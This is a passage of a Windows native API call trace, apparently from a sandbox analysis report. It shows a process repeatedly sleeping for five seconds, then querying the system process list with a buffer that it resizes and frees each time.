NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0179.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0179.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.528] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0179.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0179.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.663] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0179.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0179.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.825] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0179.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0180.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.012] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0180.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0180.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.416] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0180.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0180.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.573] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0180.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0180.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.749] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0180.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0180.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.983] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0181.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0181.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0181.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0181.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0181.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.517] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0181.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0181.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0181.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0181.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0181.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0181.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.706] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0181.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0181.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0181.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0181.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0181.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0182.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.175] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0182.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0182.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.406] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0182.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0182.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.576] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0182.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0182.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.765] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0182.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0182.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.900] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0182.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0183.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.097] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0183.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0183.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.472] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0183.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0183.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.639] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0183.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0183.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.852] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0183.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0184.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.245] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0184.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0184.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.425] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 